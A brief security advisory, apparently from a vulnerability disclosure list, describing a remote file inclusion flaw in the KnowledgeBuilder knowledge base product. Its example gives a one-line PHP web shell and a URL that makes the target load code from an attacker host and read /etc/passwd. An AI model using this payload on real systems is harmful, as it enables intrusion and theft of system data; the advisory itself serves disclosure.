|
|
| |
| KnowledgeBuilder is "a feature-packed knowledge base solution". A remote command execution vulnerability in the product allows remote attackers to compromise the system on which the product is installed on. |
| |
Credit:
The information has been provided by Zero_X www.lobnan.de Team.
|
| |
Example:
Create the following file on your webserver:
<?
system($cmd);
?>
Then type in the following URL:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat%20/etc/passwd
|
|
|
